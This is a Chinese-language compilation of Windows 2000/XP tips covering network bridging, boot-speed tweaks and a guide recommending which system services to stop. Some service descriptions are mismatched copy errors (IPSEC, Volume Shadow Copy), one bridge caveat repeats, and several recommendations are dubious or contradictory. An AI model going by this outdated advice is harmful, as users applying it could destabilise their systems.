    3．在"常规"选项卡的"适配器"下，选择要删除的适配器旁边的复选框，然后单击"确定"。

    但是，在这里要注意以下几个方面：必须以管理员或 Administrators 组成员身份登录才能完成该过程。如果计算机与网络连接，则网络策略设置也可以阻止您完成此步骤；必须至少选择两个合格的网络连接才能使用"桥接"创建桥；已启用 Internet 连接共享 (ICS) 或 Internet 连接防火墙 (ICF) 的适配器不能成为网桥的一部分，也不会出现在网桥清单中。同样，"添加到桥"菜单命令只适用于可作为连接添加到网桥的适配器；只有以太网、IEEE-1394 适配器或者诸如无线这样的以太网兼容适配器，以及家庭电话线适配器 (HPNA) 才可以成为网桥的一部分；如果没有启用 ICF 或 Internet 连接共享 (ICS)，请不要在公用 Internet 连接和专用网络连接之间创建桥，或者将公用 Internet 连接添加到现有网桥。这样做将在您的网络和 Internet 之间创建不受保护的链接，因此您的网络容易受到攻击；一台计算机上只能创建一个网桥，不过该桥可以容纳无数网络连接；无法在运行 Windows 2000 或更早版本 Windows 的计算机上创建桥接；如果从网桥删除了适配器，而且保留的适配器不足两个，则网桥不会执行预期的功能，不过将继续使用系统资源；当以前显示在"LAN 或高速 Internet"下的网络适配器添加为连接时，它将出现在"网桥"下。提供 Internet 连接的网络适配器（如 DSL 和电缆调制解调器）不能被桥接，而且将始终出现在"LAN 或高速 Internet"下；在启用网桥前，必须使用"桥接"创建网桥；如果禁用网桥，则网络上的计算机将无法与其他网络段上的计算机通讯。网络上的某些计算机还可能中断 Internet 连接；如果从网桥删除了适配器，而且保留的适配器不足两个，则网桥不会执行预期的功能，不过将继续使用系统资源；至少必须有两个适配器连接到桥才能保证其功能；如果打开了"网络连接"文件夹，也可以从网桥删除网络连接，在"网桥"下，右键单击要删除的适配器，然后单击"从网桥删除"；如果从网桥删除适配器，而且保留的适配器不足两个，则网桥不会执行预期的功能，不过将继续使用系统资源。使用无线或 IEEE-1394 连接的网桥只支持使用网际协议版本 4 (IPv4) 的通信；Internet 连接共享、Internet 连接防火墙、发现和控制，以及网桥在 Windows XP 64-Bit Edition 中都是可用的。

那么网桥到底能够达到何种效果和有何应用价值呢？其实通过网桥可以进行网桥的组策略，其大意就是"网桥"使计算机管理员可跨两个或多个网络连接创建桥，使网络通信可通过桥中包括的所有网络连接，就好像所有这些连接都是同一网络子网的一部分。"组策略"设置将定义系统管理员需要管理的用户桌面环境的各种组件。禁止在您的 DNS 域网络上安装和配置，使用网桥确定具有管理权限的计算机用户是否可在 DNS 域网络上启用"网桥"。

    只有存在两个或多个网络适配器时，"网桥"菜单命令"桥接"才是可用的。默认情况下，"网桥"被禁用，但是管理员可以使用网络连接图标上的菜单启用它。如果启?quot;禁止在您的 DNS 域网络上安装，配置，使用网桥"设置以禁止在域网络上使用"网桥"，则因为"桥接"命令已从网络连接图标的菜单上删除，所以无法创建"网桥"。禁止权限有限的计算机用户配置"网桥"，而不管该设置是什么。

    如果在启用该策略前网络上的计算机中已经存在"网桥"，则因为该设置知道位置，所以此桥将继续存在。只有当计算机连接到该设置最后一次刷新时所连接到的同一 DNS 域网络时，才应用该设置。如果计算机（如笔记本电脑）连接到您的 DNS 域网络，但是计算机上的这一设置最后一次刷新是在其他网络上进行的，则您网络上的此设置不会应用到该计算机。


Windows2K及WindowsXP应用技巧

《一键清理系统垃圾》

Windows2K及WindowsXP应用技巧

    每个Windows用户都希望Windows的启动速度越快越好，不过，如果你想让Windows启动速度更快些，还要掌握一些加速Windows启动的独门秘技！

    1.不容忽视的磁盘IDE通道

    Windows XP中有一个非常影响启动速度的设置，那就是磁盘IDE通道。一般来说，Windows XP用户不需要安装主板的IDE驱动或补丁程序，ULTRA DMA功能就已经打开了。也正因为如此，绝大多数用户会让IDE通道处于自动状态，但这会导致Windows XP启动变慢——因为主板可以连接四个IDE设备，但大多数电脑只有两个IDE设备，即硬盘和光驱。少数人可能有单硬盘、双光驱(DVD和刻录机)或双硬盘、单光驱，即便这样也只有三个IDE设备，所以一般都有1~2个IDE通道处于空闲状态。此时，你应该把并不存在的IDE设备设置为“无”，而不是“自动检测”。

    提示：设置IDE通道的方法是：单击“开始→控制面板”，双击“系统”，切换到“硬件”选项卡，单击“设备管理器”，再双击“IDE ATA/ATAPI控制器”。双击下面的“主要IDE通道”或“次要IDE通道”。我们可以看到，“设备0”下面的“设备类型”不可选，表明该IDE通道目前已被使用。“设备1”下面的“设备类型”可选，如果你近期内不再添加新的IDE设备，可以将“设备类型”设置为“无”。

    2.禁用服务和启用Power User

    Windows 2000/XP的启动速度要比Windows 9x/Me慢，众多的服务是重要因素之一，因此普通用户禁用一些无用的服务，对启动速度也有很大帮助：

    alerter (用户不在局域网并且不需要管理警报)

    clipbook (用户不需要查看远程剪贴簿的剪贴页面)

    distributed link tracking client (用户不使用NTFS分区并且没有连入局域网)

    distributed transaction coordinator (不需要同时处理多个数据库或文件系统)

    fax service (不需要发送或接收传真)

    ftp publishing service(你的电脑不做为FTP服务器使用)

    iis admin service (你的电脑不做为Web服务器使用)

    另外，建议大家创建一个Power User用户，平时用它来登录Windows 2000/XP，因为相比管理员身份，它启动的服务更少同时也更加安全。

    3.及时清理日志文件

    Windows 2000/XP的日志文件比较容易被用户忽视。其实当我们每次开关机、运行程序、系统报错时，这些信息都会被记录下来，保存在日志文件中。但日志文件会随着时间的增长越来越大，从而影响了系统启动速度。我们可以自己指定日志文件的大小及处理方式：

    进入“开始→设置→控制面板→管理工具”，双击“事件查看器”或是单击“开始→运行”，输入“eventvwr.msc”后回车，即可打开“事件查看器”，在右侧窗口中可看到应用程序日志、安全日志和系统日志。在任意一种日志上面右击并选择“属性”，就可以在如图所示的对话框中为日志文件设定最大值，还可以选择当日志满了以后的处理方式——一般来说让它自动覆盖一段时间以前的旧日志，这样日志文件就永远不会超出指定大小。单击“筛选器”选项卡可以指定需要写入日志文件的事件类型。

    设置“系统日志”的属性

    4.借花献佛加快Windows 2000启动

    Windows XP相比Windows 2000在很多方面进行了优化改进，因而启动速度更快，那么能不能让Windows 2000也可以享受这样的好处呢？其实，只要找到Windows XP相应语言版本文件，然后替换Windows 2000的相应文件即可。这两个文件为NTLDR、NTDETECT.COM，它们都在系统分区的根目录下。当然，为了防止Windows 2000出错，建议用户在替换这两个文件前备份Windows 2000原有的同名文件。

    5.让蓝色滚动条只滚动一圈

    这是一个适用于Windows XP的秘技。打开“注册表编辑器”，依次展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]分支，然后双击右侧窗口中的DWORD值“EnablePrefetcher”，将其值由“3”改为“1”。退出注册表编辑器并重启电脑，你会发现进入Windows XP时蓝色滚动条的滚动时间明显减少了！


Windows XP/2003系统服务详解

《一键清理系统垃圾》

Windows XP/2003系统服务详解

    当每次启动Windows XP/2003时，总会有相当多的程序或服务被调入到系统的内存中，它们用来控制Windows系统的硬件设备、内存、文件管理或者其他重要的系统功能。但是，这些服务有很大一部分是用户根本不需要的，在系统安全方面反而会造成很大的隐患。我们完全可以根据自己的需要，适当禁用自己不需要的系统服务，这样不仅可以节约系统资源，加快系统运行速度，而且还能起到保护系统安全的作用。

    一、什么是系统服务
    1.什么是系统服务
    在Windows 2000/XP/2003系统中，服务是指执行指定系统功能的程序、例程或进程，以便支持其他程序，尤其是低层(接近硬件)程序。通过网络提供服务时，服务可以在Active Directory(活动目录)中发布，从而促进了以服务为中心的管理和使用。

    服务是一种应用程序类型，它在后台运行。服务应用程序通常可以在本地和通过网络为用户提供一些功能，例如客户端/服务器应用程序、Web服务器、数据库服务器以及其他基于服务器的应用程序。

    2.系统服务的作用
    (1)启动、停止、暂停、恢复或禁用远程和本地计算机服务。

    (2)管理本地和远程计算机上的服务。

    (3)设置服务失败时的故障恢复操作。例如，重新自动启动服务或重新启动计算机。

    (4)为特定的硬件配置文件启用或禁用服务。

    (5)查看每个服务的状态和描述。

    二、配置和管理系统服务
    通过上面的阅读，相信你已对Windows系统服务有所了解，与系统注册表类似，对系统服务的操作，我们可以通过“服务管理控制台”来实现。

    1.系统服务控制台
    以管理员或Administrators组成员身份登录，单击“开始→运行”菜单项，在出现的对话框中键入“Services.msc”并回车，即可打开“服务管理控制台”。你也可以单击“开始→控制面板→性能和维护→管理工具→服务”选项来启动该控制台。

    在服务控制台中，双击任意一个服务，就可以打开该服务的属性对话框。在这里，我们可以对服务进行配置、管理操作，通过更改服务的启动类型来设置满足自己需要的启动、关闭或禁用服务。

    在“常规”选项卡中，“服务名称”是指服务的“简称”，并且也是在注册表中显示的名称；“显示名称”是指在服务配置界面中每项服务显示的名称；“描述”是为该服务作的简单解释；“可执行文件的路径”即是该服务对应的可执行文件的具体位置；“启动类型”是整个服务配置的核心，对于任意一个服务，通常都有3种启动类型，即自动、手动和已禁用。只要从下拉菜单中选择就可以更改服务的启动类型。“服务状态”是指服务的现在状态是启动还是停止，通常，我们可以利用下面的“启动”、“停止”、“暂停”、“恢复”按钮来改变服务的状态。

    下面让我们来看看3种不同类型的启动状态：

    自动：此服务随着系统启动时启动，它将延长启动所需要的时间，有些服务是必须设置为自动的，如Remote Procedure Call(RPC)。由于依存关系或其他影响，其他的一些服务也必须设置为自动，这样的服务最好不要去更改它，否则系统无法正常运行。

    手动：如果一个服务被设置为手动，那么可以在需要时再运行它。这样可以节省大量的系统资源，加快系统启动。

    已禁用：此类服务不能再运行。这个设置一般在提高系统安全性时使用。如果怀疑一个陌生的服务会给你的系统带来安全上的隐患，可以先尝试停止它，看看系统是否能正常运行，如果一切正常，那么就可以直接禁用它了。如果以后需要这个服务，在启动它之前，必须先将启动类型设置为自动或手动。

    单击“依存关系”选项卡，在这里我们可以看到，在顶端列表中指出运行选定服务所需的其他服务，底端列表指出了需要运行选定服务才能正确运行的服务。它说明了一些服务并不能单独运行，必须依*其他服务。在停止或禁用一个服务之前，一定要看看这个服务的依存关系，如果有其他需要启动的服务是依*这个服务，就不能将其停止。在停止或禁用一个服务前，清楚了解该服务的依存关系是必不可少的步骤。

    2.选择将运行服务的账户
    在上述对话框中单击“登录”选项卡，执行下述操作之一：

    (1)要使用本地系统账户，单击“本地系统账户”选项。

    (2)要使用本地服务台账户，单击“本账户”选项，然后键入“NT AUTHORITY\LocalService”。

    (3)要使用网络服务账户，单击“本账户”选项，然后键入“NT AUTHORITY\NetworkService”。

    (4)要指定另一个账户，单击“本账户”选项，然后单击“浏览”按钮，然后在“选择用户”对话框中指定用户账户即可。

    最后在“密码”和“确认密码”框中键入用户账户的密码，单击“确定”按钮。

    注意：必须明确配置用户账户以便登录到服务。要验证用户账户是否经过了正确配置，请在“本地用户和组”中右键单击该用户账户。在“属性”对话框的“常规”选项卡上，确认已选中“密码永不过期”复选框，然后单击“成员”选项卡来确认该用户是适当组的成员。

    如果选择的账户没有作为服务登录的权限，则在你当前管理的计算机上，服务会自动授予该账户适当的权限。

    三、系统服务的备份与灾难保护
    1.备份系统服务
    在对系统服务进行配置管理以前，对其进行备份是相当重要的，一旦出现错误可以马上恢复到正常状态。这里，我们介绍直接备份注册表中与服务相关的内容。

    (1)运行注册表编辑器，依次展开注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services。

    (2)单击“文件→导出”菜单命令，在出现的对话框中，单击“所选分支”选项，将此分支下的注册表内容导出并保存为一个REG文件。如果需要恢复系统服务，可以直接双击该REG文件导入注册表。

    2.灾难保护
    如果由于你的误操作，不慎禁用了某一个重要的服务，导致Windows无法启动，因此，你也无法重新启动相应的服务，这就造成了一个恶性循环。在这种情况下，我们只能使用系统控制台来进行手动恢复。在系统控制台中，我们可以随意启动任何服务或控制服务的启动类型。

    将Windows XP安装光盘放入光驱中，然后在BIOS中将光驱启动设置为优先。启动电脑进入“欢迎使用安装程序”界面时，依照提示，按下R键进入Windows XP“故障恢复控制台”界面。选择需要修复的系统，并键入系统管理员密码。

    在命令提示符状态下，我们需要用到“Enable”和“Disable”命令。其中，Enable的命令格式为“enable [service_name] [startup_type]”；Disable的命令格式为“disable [service_name]”。在这里，[service_name]是希望启用/禁用的服务或设备名称，[startup_type]则是启动的类型，表示了不同的启动类型。可用的类型包括有Service_disabled、Service_boot_start、Service_system_start、Service_auto_start、Service_demand_start。

    下面我们以禁用Windows XP中的系统帮助为例，先将该服务的启动类型设置为禁用，然后重新启用它。

    (1)进入“故障恢复控制台”界面，运行“listsvc”命令查看各种服务的运行状态，在这里，我们可以看到系统帮助服务是启动的，输入“disable helpsvc”命令并回车，即可将系统帮助服务禁用。

    (2)如果需要重新启动该服务并设置该服务随系统自动运行，可以输入“enable helpsvc service_boot_start”命令回车即可。

    上文中，我们已对系统服务的配置与管理作了详细的讲解，下面就让我们来了解系统中每一个服务的具体含义。

    注意：本文中涉及到的服务，均为Windows XP安装完成后的默认服务。

    四、系统功能服务详解
    1.Alerter
    Alerter(警报器)。将系统上发生的与管理有关的事件以警示信息传送至网络上指定的电脑或用户，例如当发生打印错误或硬盘即将写满等事件，即由该服务负责收集、送出。该服务进程名为Services.exe(即启动这个服务后在的后台运行的进程名称，可以通过任务管理器查看到，如图3所示)。

    依存关系：Workstation

    建议：一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts)，除非你的计算机用在局域网络上，停止。

    2.Application Management
    AppMgmt(应用程序管理服务)。提供软件安装服务，如分派、发行以及删除。该服务进程名为Svchost.exe。

    依存关系：无

    建议：启动。

    3.Automatic Updates
    Wuauserv(自动更新服务)。从Windows Update启用Windows更新的下载和安装。该服务进程名为Svchost.exe。

    依存关系：无

    建议：启动。

    4.ClipBook
    ClipSrv(剪贴簿)。启用“剪贴簿查看器”储存信息并实现与远程计算机共享。该服务进程名为Clipsrv.exe。

    依存关系：Network DDE

    建议：该服务对于一般家用计算机根本涉及不到，可以根据具体情况，停止。

    5.COM+ Event System
    EventSystem(COM+事件系统服务)。支持系统事件通知服务(SENS)，此服务为订阅组件对象模型(COM)组件事件提供自动分布功能。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)和System Event Notification

    建议：有些程序可能用到COM+ 组件，像BootVis的Optimize system应用，根据具体情况，启动。

    6.COM+ System Application
    COMSysApp(COM+系统应用服务)。管理基于COM+组件的配置和跟踪。该服务进程名为Dllhost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：如果COM+ Event System是一辆车，那么COM+ System Application就是司机，根据具体情况，启动。

    7.Cryptographic Services
    CryptSvc(认证服务)。提供三种管理服务，编录数据库服务，它确定Windows文件的签字；受保护的根服务，它从此计算机添加和删除受信根证书机构的证书；密钥(Key)服务，它帮助注册此计算机获取证书。如果此服务被终止，这些管理服务将无法正常运行。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：该服务即是Windows Hardware Quality Lab(WHQL)认证，如果你使用Automatic Updates，启动。

    8.Distributed Transaction Coordinator
    MSDTC(分布式交易协调器)。协调跨多个数据库、消息队列、文件系统等资源管理器的事务。该服务的进程名为Msdtc.exe。

    依存关系：Remote Procedure Call(RPC)和Security Accounts Manager

    建议：一般家用计算机涉及不到，除非你启用Message Queuing服务，停止。

    9.Error Reporting Service
    ERSvc(错误报告服务)。服务和应用程序在非标准环境下运行时允许错误报告。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：该服务即微软的应用程序错误报告，基于安全性考虑，停止。

    10.Event Log
    EventLog(系统事件记录服务)。启用在事件查看器查看基于Windows的程序和组件颁发的事件日志消息。该服务进程名为Services.exe。

    依存关系：Windows Management Instrumentation

    建议：该服务是基础服务，请不要调整其状态。

    11.Fast User Switching Compatibility
    FastUserSwitchingCompatibility(多用户快速切换服务)。为在多用户状态下需要协助的应用程序提供管理。该服务进程名为Svchost.exe。

    依存关系：Terminal Services

    建议：基于安全性考虑，如果不使用多用户环境，停止。

    12.Help and Support
    Helpsvc(帮助服务)。启用在此计算机上运行帮助和支持中心。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：可以根据具体情况，停止。

    13.Human Interface Device Access
    HidServ(人性化接口设备服务)。启用对智能界面设备(HID)的通用输入访问，它激活并保存键盘、远程控制和其他多媒体设备上的预先定义的快捷键。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：如果你有符合人体工程学标准的设备(键盘、鼠标)，请将该服务设置为自动。

    14.Indexing Service
    Cisvc(索引服务)。本地和远程计算机上文件的索引内容和属性，通过灵活查询语言提供文件快速访问。该服务进程名为Cisvc.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：该服务可以让你加快搜查速度，不过应该很少人进行远程计算机搜寻，停止。

    15.Internet Connection Firewall(ICF)/Internet Connection Sharing(ICS)
    SharedAccess(Internet连接共享和防火墙服务)。为家庭或小型办公网络提供网络地址转换，定址以及名称解析和/或防止入侵服务。该服务进程名为Svchost.exe。

    依存关系：Application Layer Gateway Service、Network Connections、Network Location Awareness(NLA)、Remote Access Connection Manager

    建议：如果不使用因特网联机共享(ICS)或是内置的因特网联机防火墙(ICF)，停止。

    16.Logical Disk Manager Administrative Service
    Dmadmin(逻辑磁盘管理员系统管理服务)。配置硬盘驱动器和卷。此服务只为配置处理运行，然后终止。该服务进程名为Dmadmin.exe。

    依存关系：Plug and Play、Remote Procedure Call(RPC)、Logical Disk Manager

    建议：使用Microsoft Management Console(MMC)主控台的功能时才用到，根据具体情况，可设置为手动。

    17.Print Spooler
    Spooler(打印后台处理服务)。将文件加载到内存中，待打印机空闲后，再将数据送往打印机处理。该服务进程名为Spoolsv.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：设置为手动。如果没有打印机，可停止。

    18.Remote Registry
    RemoteRegistry(远程注册表服务)。使远程用户能修改此计算机上的注册表设置。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：基于安全性的理由，如果没有特别的需求，停止。

    19.Security Accounts Manager
    SamSs(安全性账户管理服务)。存储本地用户账户的安全信息。该服务进程名为Lsass.exe。

    依存关系：Remote Procedure Call(RPC)、Distributed Transaction Coordinator

    建议：管理账号和组策略(Gpedit.msc)应用，启动。

    20.SSDP Discovery Service
    SSDPSRV(简易服务发现协议之发现服务)。在你的家用网络上启用通用即插即用设备的搜索。通用随插即用服务(Universal Plug and Play，UPnP)让计算机可以找到并使用网络上的设备，经由网络联机通过TCP/IP来搜索设备。该服务进程名为Svchost.exe。

    依存关系：Universal Plug and Play Device Host

    建议：基于安全性考虑，停止。

    21.System Event Notification
    SENS(系统事件通知服务)。跟踪系统事件，如登录Windows、网络以及电源事件等。将这些事件通知给COM+事件系统“订阅者(subscriber)”。该服务进程名为Svchost.exe。

    依存关系：COM+ Event System

    建议：基于安全性考虑，停止。

    22.Task Scheduler
    Schedule(计划任务服务)。使用户能在此计算机上配置和制定自动任务的日程。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：设置自动定时磁盘扫描、病毒定时扫描、更新等，视具体情况而定。

    23.Themes
    Themes(主题服务)。为用户提供使用桌面主题管理。该服务进程名为Svchost.exe。

    依存关系：无

    建议：很多人都喜欢使用XP的桌面主题，启动。

    24.Upload Manager
    Uploadmgr(上传管理服务)。管理网络上客户端和服务器之间同步和异步文件传输。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：视具体情况而定，停止。

    25.Volume Shadow Copy
    VSS(上传管理服务)。管理并执行用于备份和其他目的的卷影复制。该服务进程名为Vssvc.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：视具体情况而定，停止。

    26.WebClient
    WebClient(Web客户端服务)。使基于Windows的程序能创建、访问和修改基于Internet的文件。服务进程名为Svchost.exe。

    依存关系：WebDav Client Redirector

    建议：使用WebDAV将文件上传到所有的Web服务，基于安全性考虑，停止。

    27.Windows Installer
    MSIServer(Windows安装服务)。根据包含在MSI文件中的指示来安装、修复或删除软件。它是一个系统服务，协助使用者正确地安装、设定、追踪、升级和移除软件程序，可管理应用程序建立和安装的标准格式，并且追踪例如档案群组、登录项目及快捷方式等组件。该服务进程名为Msiexec.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：视具体情况而定。

    28.Windows Management Instrumentation(WMI)
    Winmgmt(Windows管理规范服务)。提供共同的界面和对象模式以便访问有关操作系统、设备、应用程序和服务的管理信息。该服务进程名为Svchost.exe。

    依存关系：Event Log、Remote Procedure Call(RPC)

    建议：是一种提供标准的基础结构来监视和管理系统资源的服务，启动。

    五、功能扩展服务详解
    1.IMAPI CD-Burning COM Service
    ImapiService(IMAPI CD刻录服务)。用Image Mastering Applications Programming Interface(IMAPI)管理CD刻录。如果停止该服务，这台计算机将无法录制CD。该服务进程名为Imapi.exe。

    依存关系：无

    建议：Windows XP整合的CD刻录功能比较单一，根据具体情况，停止。

    2.IPSEC Services
    Dmserver(IP 安全性服务)。监测和监视新硬盘驱动器，并向逻辑磁盘管理器管理服务发送卷信息以便配置。该服务进程名为Svchost.exe。

    依存关系：IPSEC driver、Remote Procedure Call(RPC)、TCP/IP Protocol Driver

    建议：协助保护经由网络传送的数据，IPSEC为一重要环节，为虚拟私人网络(VPN)中提供安全性，而VPN允许组织经由因特网安全地传输数据。一般用户者涉及不到，停止。

    3.Logical Disk Manager
    Dmserver(逻辑磁盘管理员服务)。监测和监视新硬盘驱动器，并向逻辑磁盘管理器管理服务发送卷的信息以便配置。该服务进程名为Svchost.exe。

    依存关系：Plug and Play、Remote Procedure Call(RPC)、Logical Disk Manager Administrative Service

    建议：该服务对于经常使用移动硬盘、闪盘等外设的用户必不可以，根据具体情况，启动。

    4.MS Software Shadow Copy Provider
    SwPrv(管理磁盘区卷复制服务)。如果该服务被停止，软件卷影复制将无法管理，任何依赖它的服务将无法启动，如MS Backup。该服务进程名为Dllhost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：根据具体情况，启动。

    5.Performance Logs and Alerts
    SysmonLog(效能记录日志及警示服务)。收集本地或远程计算机基于预先配置的日程参数的性能数据，然后将此数据写入日志或触发警报。该服务进程名为Smlogsvc.exe。

    依存关系：无

    建议：停止。

    6.Plug and Play
    PlugPlay(即插即用服务)。使计算机在没有用户输入的情况下，能识别并适应硬件的更改。该服务进程名为Services.exe。

    依存关系：Logical Disk Manager、Logical Disk Manager Administrative Service、Messenger、Smart Card、Telephony、Windows Audio

    建议：终止或禁用此服务会造成系统不稳定，启动。

    7.Portable Media Serial Number Service
    WmdmPmSN(便携的媒体序号服务)。获得系统中媒体播放器的序列号，用于控制盗版音乐文件复制到便携播放器上，如MP3、MD等。该服务进程名为Svchost.exe。

    依存关系：无

    建议：启动。

    8.Protected Storage
    Protected Storage(受保护的存放区服务)。提供对敏感数据(如密码)的保护性存储，以便防止未授权的服务、过程或用户对其非法访问。该服务进程名为Lsass.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：视具体使用环境而定，在不安全的环境下建议停止。

    9.Removable Storage
    NtmsSvc(卸除式存放装置服务)。对特殊可移动存储器的管理，如ZIP软驱和磁带驱动器。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：一般人很少涉及到这类特殊设备，停止。

    10.Shell Hardware Detection
    ShellHWDetection(外壳硬件探测服务)。为自动播放硬件事件提供通知。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：一般在存储卡或CD、DVD设备上使用，停止。

    11.Smart Card
    SCardSvr(智能卡服务)。管理此计算机对智能卡的取读访问。如果此服务被终止，此计算机将无法读取智能卡。该服务进程名为Scardsvr.exe。

    依存关系：Plug and Play

    建议：如果你不使用智能卡，停止。

    12.Smart Card Helper
    SCardDrv(智能卡协助服务)。启用对此计算机使用的旧式非即插即用智能卡读取器的支持。该服务进程名为Scardsvr.exe。

    依存关系：无

    建议：如果你不使用智能卡，停止。

    13.System Restore Service
    Srservice(系统还原服务)。执行系统还原功能。 要停止服务，请从“我的电脑”的属性中的系统还原选项卡关闭系统还原。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：将计算机回复至先前状态，视具体情况而定。

    14.Telephony
    TapiSrv(电话语音)。提供TAPI的支持，以便程序控制本地计算机，服务器以及LAN上的电话设备和基于IP的语音连接。该服务进程名为Svchost.exe。

    依存关系：Plug and Play、Remote Procedure Call(RPC)、Remote Access Connection Manager、Remote Access Auto Connection Manager

    建议：一般拨号调制解调器或是一些DSL/Cable可能用到，视具体情况而定。

    15.Uninterruptible Power Supply
    UPS(UPS电源管理服务)。管理连接到计算机的不间断电源(UPS)。该服务进程名为Ups.exe。

    依存关系：无

    建议：一般人使用不到UPS，停止。

    16.Universal Plug and Play Device Host
    Upnphost(统一即插即用驱动主机服务)。为通用即插即用设备提供支持。主要用来侦测安装通用即插即用服务设备，如数码相机或打印机。该服务进程名为Svchost.exe。

    依存关系：SSDP Discovery Service

    建议：视具体情况而定，停止。

    17.Windows Audio
    AudioSrv(Windows音频服务)。管理基于Windows程序的音频设备。该服务进程名为Svchost.exe。

    依存关系：Plug and Play、Remote Procedure Call(RPC)

    建议：如果你没有声卡可以停止它。

    18.Windows Image Acquisition(WIA)
    Stisvc(Windows影像取得服务)。为扫描仪和照相机提供图像捕获服务。如果扫描仪和数码相机内部具有支持WIA功能，那就可以直接看到图像文件，不需要其他的驱动程序。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：没有扫描仪和数码相机的用户，停止。

    19.Windows Management Instrumentation Driver Extensions
    Wmi(Windows管理规范驱动延伸服务)。与驱动程序间交换系统管理信息。该服务进程名为Svchost.exe。

    依存关系：无

    建议：WMI服务的延伸，提供信息使用，启动。

    20.Windows Time
    W32Time(Windows 时间设定)。维护在网络上的所有客户端和服务器的时间和日期同步。该服务进程名为Svchost.exe。

    依存关系：无

    建议：视具体情况而定，启动。

    21.Wireless Zero Configuration
    WZCSVC(无线配置服务)。为你的802.11适配器提供自动配置。该服务进程名为Svchost.exe。

    依存关系：NDIS Usermode I/O Protocol、Remote Procedure Call(RPC)

    建议：视具体情况而定，启动。

    22.WMI Performance Adapter
    WmiApSrv(WMI性能适配器服务)。从WMI HiPerf提供程序性能库信息。该服务进程名为Wmiapsrv.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：视具体情况而定，停止。

    六、网络服务详解
    1.Application Layer Gateway Service
    ALG(应用层网关)。为Internet连接共享和Internet连接防火墙提供第三方协议插件的支持。该服务进程名为Alg.exe。

    依存关系：Internet Connection Firewall(ICF)/Internet Connection Sharing(ICS)

    建议：如果你不使用因特网联机共享(ICS)提供多台计算机的因特网存取和因特网联机防火墙(ICF)软件，停止。

    2.Background Intelligent Transfer Service
    BITS(后台智能传输服务)。使用空闲的网络带宽传输数据。当网络切断或计算机需要重新启动时，该服务会自动对文件传输加以维护，当网络重新连接时，该服务将从停止的地方继续开始传输文件。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)和 Workstation

    建议：该服务的应用即是实现支持Windows自动更新时的断点续传，根据Automatic Updates服务的具体情况，启动。

    3.Computer Browser
    Browser(计算机浏览器服务)。维护网络上计算机的更新列表，并将列表提供给计算机指定浏览。该服务进程名为Svchost.exe。

    依存关系：Server 和 Workstation

    建议：一般家用计算机涉及不到，除非你的计算机位于局域网内，停止。

    4.DHCP Client
    Dhcp(DHCP客户端服务)。通过注册和更改IP地址以及DNS名称来管理网络配置。简单地讲，DHCP就是由网络中的一台主机将所有的网络参数自动分配给网络内的任何一如计算机，而DHCP客户端就是网络中被分配网络参数的对象计算机。该服务进程名为Svchost.exe。

    依存关系：AFD网络支持环境、SYMTDI、TCP/IP Protocol Driver和NetBIOS over TCP/IP

    建议：如果你的机器能在网络中被自动分配IP地址等参数，停止。对于家庭用户来讲，只要是使用DSL/Cable上网，开启ICS和IPSEC服务的，都需要这个服务来指定静态IP，启动。

    5.Distributed Link Tracking Client
    TrkWks(分布式连结追踪客户端服务)。在计算机内NTFS文件之间保持链接或在网络域中的计算机之间保持链接。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)

    建议：对于不在局域网中的用户，停止。

    6.DNS Client
    Dnscache(DNS 客户端服务)。为此计算机解析和缓冲域名系统(DNS)名称。该服务进程名为Svchost.exe。

    依存关系：TCP/IP Protocol Driver

    建议：事实上，一个网站并不是只有一台服务器在工作，基于安全性考虑，停止。

    7.Messenger
    Messenger(信使服务)。传输客户端和服务器之间的NET SEND和Alerter服务消息。此服务与Windows Messenger无关。该服务进程名为Svchost.exe。

    依存关系：NetBIOS Interface、Plug and Play、Remote Procedure Call(RPC)、Workstation

    建议：基于安全性考虑，停止。

    8.Net Logon
    Net Logon(网域登录服务)。支持网络计算机pass-through 账户登录身份验证事件。该服务进程名为Lsass.exe。

    依存关系：Workstation

    建议：如果要使用网内的域服务器登录到域网时，启动。

    9.NetMeeting Remote Desktop Sharing
    Mnmsrvc(NetMeeting 远程桌面共享)。允许经过授权的用户使用NetMeeting在公司Intranet 上远程访问这台计算机。该服务进程名为Mnmsrvc.exe

    依存关系：Remote Procedure Call(RPC)

    建议：视具体情况，停止，但关闭它后，远程桌面共享功能将无法使用。

    10.Network Connections
    Netman(网络联机)。管理“网络和拨号连接”文件夹中对象，在其中你可以查看局域网和远程连接。该服务进程名为Svchost.exe。

    依存关系：Remote Procedure Call(RPC)、Internet Connection Firewall(ICF)/ Internet Connection Sharing(ICS)

    建议：关闭它之后，在“网络和拨号连接”对话框中将什么也看不到，更不用说新建连接和拨号上网了，因此除非你的机器是绝对的单机环境，启动。

    11.Network DDE
    NetDDE(网络动态数据交换服务)。为在同一台计算机或不同计算机上运行的程序提供动态数据交换(DDE)的网络传输和安全。该服务进程名为Netdde.exe。

    依存关系：Network DDE DSDM、ClipBook

    建议：如无需ClipBook服务，停止。

    12.Network DDE DSDM
